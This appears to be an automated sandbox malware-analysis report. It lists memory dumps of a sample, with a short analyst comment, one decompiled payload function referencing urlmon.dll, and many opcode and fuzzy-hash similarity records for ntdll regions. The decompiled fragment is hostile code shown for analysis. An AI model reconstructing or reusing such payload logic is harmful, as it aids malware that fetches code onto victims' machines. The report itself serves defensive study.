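On the sample, the 0x01510000 dump resolves to "system library (ntdll strings)" and the 0x00400000 dump to "payload (Yara match)"; both are PAGE_EXECUTE_READWRITE under the assumed name layout, which is itself worth noting, since a legitimately mapped ntdll image is not normally writable and executable at once. The "unknown" verdict is kept deliberately: records whose strings are single characters such as "@" or "`" say nothing on their own, and a second pass by fuzzy hash against a known-good ntdll is the next step rather than a guess.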
                                                    C-Code - Quality: 25%
                                                    			E004172EA(intOrPtr* __eax, void* __ecx) {
                                                    				intOrPtr* _t11;
                                                    				void* _t17;
                                                    				intOrPtr* _t23;
                                                    				void* _t27;
                                                    				void* _t28;
                                                    
                                                    				if(__eax >= 0xb8) {
                                                    					_t28 = _t27 + 1;
                                                    					asm("clc");
                                                    					__eflags = __eax -  *__eax;
                                                    					 *__eax =  *__eax + __eax;
                                                    					E0041B7E0();
                                                    					_t2 = _t28 - 0x24; // 0x6d6c7275
                                                    					_t23 = E00414E20( *((intOrPtr*)(_t28 + 8)) + 0xc94, E0040ACD0(__eflags,  *((intOrPtr*)(_t28 + 8)) + 0xc94, _t2), 0, 0, 0x69767207);
                                                    					__eflags = _t23;
                                                    					if(_t23 == 0) {
                                                    						L5:
                                                    						__eflags = 0;
                                                    						return 0;
                                                    					} else {
                                                    						_t11 =  *_t23(0, E0041BAB0(_t17) + _t17, _t28 - 4);
                                                    						__eflags = _t11;
                                                    						if(_t11 != 0) {
                                                    							goto L5;
                                                    						} else {
                                                    							return 1;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					asm("in al, dx");
                                                    					asm("adc al, bh");
                                                    					return __eax;
                                                    				}
                                                     			}

                                                     Instruction addresses (address column of the C-Code listing above): 0x004172ed, 0x0041734f, 0x00417350, 0x00417351, 0x00417353, 0x00417355, 0x0041735d, 0x0041737d, 0x00417382, 0x00417384, 0x004173a9, 0x004173aa, 0x004173b0, 0x00417386, 0x00417398, 0x0041739a, 0x0041739c, 0x00000000, 0x0041739e, 0x004173a8, 0x004173a8, 0x0041739c, 0x004172ef, 0x004172ef, 0x004172f0, 0x004172fc, 0x004172fc

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: urlmon.dll
                                                    • API String ID: 0-491099042
                                                    • Opcode ID: ab786cd3c7ff9e4ec0bf42834403328b72304841f68b2e4be4b3dbc944f5acf1
                                                    • Instruction ID: 6b20fbd0dae596621fa7140b236b8704a685853adbd0264f9944eccca13f9f91
                                                    • Opcode Fuzzy Hash: ab786cd3c7ff9e4ec0bf42834403328b72304841f68b2e4be4b3dbc944f5acf1
                                                    • Instruction Fuzzy Hash: C5F04C72E451192AD5215299AC02FFEB738CF86725F0402A7FD18F7241D50D9D8352ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • Critical error detected %lx, xrefs: 015E8E21
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Critical error detected %lx
                                                    • API String ID: 0-802127002
                                                    • Opcode ID: 28a7af4ad75fb07f22b73d650e42653ea04e3b547a52345653e857ab4fdd08b2
                                                    • Instruction ID: 372e3f288d082cd4b8573606e82e70f3edb838abe1a27844e22c8daea31c4700
                                                    • Opcode Fuzzy Hash: 28a7af4ad75fb07f22b73d650e42653ea04e3b547a52345653e857ab4fdd08b2
                                                    • Instruction Fuzzy Hash: EE112376D14349DEDB29DFA88909B9CBBF0BB14714F24425EE569AF2C2D3740602CF14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 015CFF60
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                    • API String ID: 0-1911121157
                                                    • Opcode ID: f1dac2e4c738c971684be23406b84ea69c40f5ed9c2c175b82f7f2e06d83e830
                                                    • Instruction ID: d85e8f2514d84b9635c7e3fe69b4a8335a9d60cdfabb10c912f439d4390eb15c
                                                    • Opcode Fuzzy Hash: f1dac2e4c738c971684be23406b84ea69c40f5ed9c2c175b82f7f2e06d83e830
                                                    • Instruction Fuzzy Hash: AD11ED71A10546EFDB26EF94CC48F9CBBB2FF48B14F148048E5086F2A1C7789980DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 296527306d5400f60e83bd5c3232376b0e57502552cffb1095efb27f7e6628c9
                                                    • Instruction ID: 82fff60c6f35639c5a88f6bb7470dfb28b49e1e773347de1d1e0556030882cab
                                                    • Opcode Fuzzy Hash: 296527306d5400f60e83bd5c3232376b0e57502552cffb1095efb27f7e6628c9
                                                    • Instruction Fuzzy Hash: 2D424B75900229CFDB29CF68CD80BAABBB1FF45304F1481AAD94DAB382D7749995CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ed09e4bace3715b505816865a500105d3910918415e4a41c529f350e66ad1eb2
                                                    • Instruction ID: feb286e6da1bc1ae261ad9822c330cc7f5cb9a334391bc9d6a2b7ef959338aa9
                                                    • Opcode Fuzzy Hash: ed09e4bace3715b505816865a500105d3910918415e4a41c529f350e66ad1eb2
                                                    • Instruction Fuzzy Hash: 20F17B706082528FCB64CF18C4A1A7ABBE1FF88754F15492EF98ACF251E734D881CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be04d0bb20bc6c3867fb82e70573f5bfc7237b67810be120d07f8fd91087a1c7
                                                    • Instruction ID: f53b63283ea6785d962d49d76087eba9201c2d558a4b5eb99821f657c6c97a40
                                                    • Opcode Fuzzy Hash: be04d0bb20bc6c3867fb82e70573f5bfc7237b67810be120d07f8fd91087a1c7
                                                    • Instruction Fuzzy Hash: 26F1C031A083429FE726CF2CC840B6E7BE9BF85764F04891DE9959F281E774D841CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4129943fa37cdc71073add53274483f3df8a845d56505b11de1569eb686f9071
                                                    • Instruction ID: 3d6fa3416bdfdbd664baf32133107a5fc7802f6dea9e43653e62cb051c60ea6d
                                                    • Opcode Fuzzy Hash: 4129943fa37cdc71073add53274483f3df8a845d56505b11de1569eb686f9071
                                                    • Instruction Fuzzy Hash: 48E1B030A0175ACFEB35CF68CC84BADB7B6BFA5308F044199D9099F291D734A981CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33dacdaeff52a3ad3ecb85661d6257a0eba8c12a8044bf78d2b8b74f9507150b
                                                    • Instruction ID: a09ae690992cf8d624173acac7f5f6362682fcac7636b979a8e50ea58f9d92f3
                                                    • Opcode Fuzzy Hash: 33dacdaeff52a3ad3ecb85661d6257a0eba8c12a8044bf78d2b8b74f9507150b
                                                    • Instruction Fuzzy Hash: 86B15970E0020ADFDB25DFE9C994AADBBF9BF98308F10452AE505AF245D774A941CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d55beb10a51a07fa478139e007bbe31ea1b37c2b0c7d7f908882866be82d3a5e
                                                    • Instruction ID: da17f9d7e98fd4878677f22a674caa90ba5e40325df3d271fe7436f4af16a1ae
                                                    • Opcode Fuzzy Hash: d55beb10a51a07fa478139e007bbe31ea1b37c2b0c7d7f908882866be82d3a5e
                                                    • Instruction Fuzzy Hash: 24C112755483818FD354CF28C580A5AFBF1BF88304F584A6EF9998B352D771E985CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b369eae3ca0db647b5b6bbf1e2cb1b666f714dfa1b5e5eefec6403b6d0d057a
                                                    • Instruction ID: 3d579f6582b83bc82a1f6231e5539b38756b0c23e7f9472197751e4b3ebacc8e
                                                    • Opcode Fuzzy Hash: 4b369eae3ca0db647b5b6bbf1e2cb1b666f714dfa1b5e5eefec6403b6d0d057a
                                                    • Instruction Fuzzy Hash: F5911331E40616AFEB319AACCC44BAE7BE8BB44724F190261FA11AF2D1D7B49D40C7D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da6adead7007e3a3c1eaf96a14fb4ca74a977cc0d783592ef3ef008330b23ade
                                                    • Instruction ID: 9d56c822e55a6c6dc3576482974d406688672ac3d4828a2ea122c6bc6b11af40
                                                    • Opcode Fuzzy Hash: da6adead7007e3a3c1eaf96a14fb4ca74a977cc0d783592ef3ef008330b23ade
                                                    • Instruction Fuzzy Hash: DA8190756847069FDB26CE58C890A6F77E4FB88350F54482AEE459F241E332ED41CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f6beea53ddf24ae1e31cadeb35755688ab478da56e51e496879393d202da75d
                                                    • Instruction ID: fcc813a8862c8c4b8eb9680b09d138ab7068f4a9118884ea6c6ca033195dabc2
                                                    • Opcode Fuzzy Hash: 3f6beea53ddf24ae1e31cadeb35755688ab478da56e51e496879393d202da75d
                                                    • Instruction Fuzzy Hash: 3871E032240702AFE7318F98CC42F5ABBE5FB84BA5F14452CE6558F6A0DBB5E940CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction ID: 45d8045763d1b917759b228cd5acdecdf977e88acd61c4bc26c8d9757c7d5a51
                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                    • Instruction Fuzzy Hash: BA71617190061AEFDB10DFA5C984EEEBBB9FF88710F104469E505EB290E734AA41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 46eff53cfdc8456186251fe378ad9b84f4d4d3fe768a6ee5e786b8fdb88b73d8
                                                    • Instruction ID: da361ed92bd26599c5fadc83e72593e5db35295f6e09244faa573f4d29e24dc2
                                                    • Opcode Fuzzy Hash: 46eff53cfdc8456186251fe378ad9b84f4d4d3fe768a6ee5e786b8fdb88b73d8
                                                    • Instruction Fuzzy Hash: C351AA71205742ABD721DF68C841B2BBBE8FFA4714F14092AF4958B691E774E840CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e11a90ab79b9b792d74c20d1a177faf16c0f3cc69dc84143dd6464fad3183d0c
                                                    • Instruction ID: acbf145ba35c3b08adb86c2b0db568b352d7596fd067b7bb49a03c0a2839920e
                                                    • Opcode Fuzzy Hash: e11a90ab79b9b792d74c20d1a177faf16c0f3cc69dc84143dd6464fad3183d0c
                                                    • Instruction Fuzzy Hash: 11519176A00515CFCB24CF1CC8909BDB7F9FB88700B15895AE856AF365D734AA51CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 177aa2b02aa65f6e4467048154ff208a148d12eff148b2fba2a047ec2c617201
                                                    • Instruction ID: 867e1401946fdd4050012aa65148e4a8cd8cbb16e5421d6e1aa6f2aa29994c95
                                                    • Opcode Fuzzy Hash: 177aa2b02aa65f6e4467048154ff208a148d12eff148b2fba2a047ec2c617201
                                                    • Instruction Fuzzy Hash: 0241D6717006125BD7269E29C894B3FB79AFF94610F04861DFB2E8F2D0D734D801C692
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 611b02c1e63ea5596c5c088f2061c0250af6428da150f61a30426803e5b34c90
                                                    • Instruction ID: c609955aa9a4923d8e96867121370c481048a400dead5dadea4069c7d12f6af2
                                                    • Opcode Fuzzy Hash: 611b02c1e63ea5596c5c088f2061c0250af6428da150f61a30426803e5b34c90
                                                    • Instruction Fuzzy Hash: 7E51B372A00616DFCB65CFACC8A069EFBF5BF88350F20855AD955AF344DB70A944CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction ID: c0fdc2ba406ceb4748ac69981da2c9b685a3463daac77b275cf9b106854acced
                                                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                    • Instruction Fuzzy Hash: C3510730E04245EFEB25CB6CC1C57AEBBF1FF45318F1481A9C55A5B282C379A989C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: c2279a983d7476a6015200207a6cd79740ef5b62a8cfb89c8d2fe8ec2e67b905
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: C751B071500646DFDB1BCF58D880A92BBF5FF44304F15C0AAE9089F252E772E946CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2eefa39c2b22fdead55bae84b53d6a627d8962ef25546837697457af9c8bc5a
                                                    • Instruction ID: 79f2766ec4568cbcba32c824ec7bb14f5b7c006c478b27dcd795100390a1c5ad
                                                    • Opcode Fuzzy Hash: a2eefa39c2b22fdead55bae84b53d6a627d8962ef25546837697457af9c8bc5a
                                                    • Instruction Fuzzy Hash: B5516A71A0020ADFDF25DF59C880AEEBBB9BF88310F048155E904AF260D3B59992CFD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a381ae05735f6838bfcd2d502943b04fe5ee5363d69661dadc7971dcae8a6e9b
                                                    • Instruction ID: 4ec22519b11d2af6978cf1a2e8a9d681638443fe025330c157e299fa0ac50d1c
                                                    • Opcode Fuzzy Hash: a381ae05735f6838bfcd2d502943b04fe5ee5363d69661dadc7971dcae8a6e9b
                                                    • Instruction Fuzzy Hash: 85419335A402299BDB21DF68C940BEE7BF8BF45700F4504A6E908AF341DB74DE85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c70a45038269cfe36042ccdb3058634f6232ef433ce374e30c92cce0a70986d2
                                                    • Instruction ID: 2d84d8bb660be1d5e954f23e02651a355cee394bfb42ad6f1e318257ccba7590
                                                    • Opcode Fuzzy Hash: c70a45038269cfe36042ccdb3058634f6232ef433ce374e30c92cce0a70986d2
                                                    • Instruction Fuzzy Hash: FF41E471A403199FEB32DF18DC81FAABBA9FB55610F04409AE9459F281D774DD40CBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction ID: 7b179daf7b6b67214b0e06ad820f6f38f8dabd7c18bf7676b3b12ff16b9e0400
                                                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                    • Instruction Fuzzy Hash: 8231C332B0010A6BEB168B69C845BAFFBBBFFC4210F05846DEA09AB251DA74DD04C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91df153dc94ea01a747ae4aa8436d122ab6377a62689e31f3dde6e454fae15ed
                                                    • Instruction ID: 9373e2dac177151252e32b24532cf2fe1751fbbd7e48c9ce06ac194e344507ec
                                                    • Opcode Fuzzy Hash: 91df153dc94ea01a747ae4aa8436d122ab6377a62689e31f3dde6e454fae15ed
                                                    • Instruction Fuzzy Hash: 494175B4A4022D9FDB24DF5ACC88AADB7F4FB94314F1045E9D9199B242E7B09E84CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction ID: d2c03f990f9ad0d79da283a251b2b17b2c2a415935a2d043fb3cc2c26fc051ac
                                                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                    • Instruction Fuzzy Hash: EE31D033200641AFD7269B68C844F6ABBEAFFC5A50F18445EEB568FB42DA74DC41C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                    • Instruction ID: e384981fb09a4292d0c9b369f6ffefb6ac0a41e0d468050d8981f7a018c78c6b
                                                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                    • Instruction Fuzzy Hash: 4031D6326047069BC719DF28C885A5BB7EAFBC4210F05492EF6968B651DE30E809C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd30df1d8cf765265bffd7c51d33255f7612085fd4f99ebe2c0194b5f5fcddd
                                                    • Instruction ID: 2d26125dcb7b229b9723848d8c66e84760d1c7c52d707c8251d005ba34ef2f74
                                                    • Opcode Fuzzy Hash: 4fd30df1d8cf765265bffd7c51d33255f7612085fd4f99ebe2c0194b5f5fcddd
                                                    • Instruction Fuzzy Hash: E34160B1D006099FDB24DFA9D981BFEBBF8FF48714F14812AE914AB240DB709905CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ca38678f3e5be759fc9a84c97c3deeefec65f9ff4d89a1f5a7c309a05ecb4f7
                                                    • Instruction ID: 535da6f4fa0a1fbfe7f1dbcc3f9e009121da9566f18b4da5d216f36af6b329b1
                                                    • Opcode Fuzzy Hash: 1ca38678f3e5be759fc9a84c97c3deeefec65f9ff4d89a1f5a7c309a05ecb4f7
                                                    • Instruction Fuzzy Hash: 4931D631651B12DBCB229B28C881F6E7BA9FFA0760F514E1AF9164F5D1EB70E900C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8aad4ec28f5a8da57e211d616a32dffc8fcf66eeac5a75c96a9d48701bda02f3
                                                    • Instruction ID: 87d55c48beebf780b8378b853cf032d21337fc107894b94e95aa4b8d1bd115cc
                                                    • Opcode Fuzzy Hash: 8aad4ec28f5a8da57e211d616a32dffc8fcf66eeac5a75c96a9d48701bda02f3
                                                    • Instruction Fuzzy Hash: 0A31DE71600616DFD7658F2DE843A2EBBE5FF85760B05886AE946CF350E730D840D791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1951dc3b1a6665a43d696133822d4aacf40700c3637c4c145de589fc716cc4f3
                                                    • Instruction ID: 10ebe130f2c8e729dc27a0286d33960845a0e53233486d469bd0746a805776bf
                                                    • Opcode Fuzzy Hash: 1951dc3b1a6665a43d696133822d4aacf40700c3637c4c145de589fc716cc4f3
                                                    • Instruction Fuzzy Hash: 3E418CB5A0421ADFCB14CF58C890B9DBBF5BB99304F148069E905AF344D778AD41CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction ID: a65ee907fb86ff8aa4027870364d08350cdc8796aa580b922ea59a4ba75ee090
                                                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                    • Instruction Fuzzy Hash: 1E311671A01647BBD745EBB8C4A0BEDFB99BF92244F04415BC81C4F201DB345A45C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c476488411a98b8a7ce736d03d6ca22c71410f92877fb6b70c5826a533004ef6
                                                    • Instruction ID: 70cca6795c0fd827be76ba84b6174a02dc9bdd63dc38c12879f4c9752573f8e3
                                                    • Opcode Fuzzy Hash: c476488411a98b8a7ce736d03d6ca22c71410f92877fb6b70c5826a533004ef6
                                                    • Instruction Fuzzy Hash: BA31A6726047529BC320DF68CD81AAAB7F5FFCC700F044A29F9958B690E730E904CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26cab3dc2fc8e6111d3908c5ae57fe7b4628cde993d9cf69e7169bebb8df0184
                                                    • Instruction ID: 92ba4bff514707cbf2f37228b6db3242947ac0d4f31710d267005c25fdf8a9f5
                                                    • Opcode Fuzzy Hash: 26cab3dc2fc8e6111d3908c5ae57fe7b4628cde993d9cf69e7169bebb8df0184
                                                    • Instruction Fuzzy Hash: E931EFB1600A06DFC731CF18DC80F2ABBF9FBA4712F14095AE206AB244D374A911CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec53b6e5a5049b02db60060e59744130f00e00b777f91a23d0a5488646091024
                                                    • Instruction ID: 884d8fe370e1952afa1202b882c4690fef5e2906155483202220dc91d911ae4e
                                                    • Opcode Fuzzy Hash: ec53b6e5a5049b02db60060e59744130f00e00b777f91a23d0a5488646091024
                                                    • Instruction Fuzzy Hash: 67318C71645702CFE320CF1DC900B2ABBE9FB88B04F45496DE9999B351E7B1E844CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e369f6cc5f72f53e9be1111a161f60dc47a23e9d313e34b67aa7c0c9ae836add
                                                    • Instruction ID: 06355e150e5a7230a72a52a919317bcf8310045cec070db781831f66e1147f3e
                                                    • Opcode Fuzzy Hash: e369f6cc5f72f53e9be1111a161f60dc47a23e9d313e34b67aa7c0c9ae836add
                                                    • Instruction Fuzzy Hash: 5531C372A0021AABDF119F68CD41A7FB7B8FF94700B01446AF945EF250E7759D11CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30658cd7ef88efd6933a4610480d3e1df603c7a055eae062f615649e256dd71a
                                                    • Instruction ID: 0a5e25beec33a319d04d8f9b8e2db764e715b6bdf18cc5c3f5a1393c94a50502
                                                    • Opcode Fuzzy Hash: 30658cd7ef88efd6933a4610480d3e1df603c7a055eae062f615649e256dd71a
                                                    • Instruction Fuzzy Hash: FB31EF322416629BC732AE58DD46B2EBBEAFFC0610F44442AE8660F641C7B0D800CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
